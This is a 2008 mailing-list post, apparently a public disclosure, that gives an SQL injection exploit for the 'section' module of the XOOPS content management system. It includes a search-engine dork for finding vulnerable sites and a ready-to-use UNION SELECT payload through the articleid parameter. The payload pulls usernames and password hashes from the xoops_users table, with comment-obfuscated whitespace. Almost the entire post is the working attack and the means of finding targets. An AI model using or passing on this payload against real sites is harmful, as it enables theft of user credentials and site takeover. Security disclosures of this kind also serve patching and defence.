
Date: 18 Feb 2008 17:20:16 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: XOOPS Module section SQL Injection(articleid)

###############################################################
# 
#   XOOPS Module section SQL Injection(articleid)
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME 1 : http://www.milw0rm.com/author/1334
#   
# MA&#304;L : hackturkiye.hackturkiye@...il.com
#        
################################################################
# 
#  DORK 1 : allinurl: modules/wfsection/print.php?articleid=
# 
################################################################
   EXPLOIT : 

-9999999+union/**/select/**/char(117,115,101,114,110,97,109,101,58),1,2,concat(uname,0x3a,pass),0,0,0,0,0,0,1,1,1,1,0,char(117,115,101,114,110,97,109,101,58),0,0,0,1,2,2,0,0,0,2,2,2+from/**/xoops_users/*%20where%20pass%20admin%20


################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################



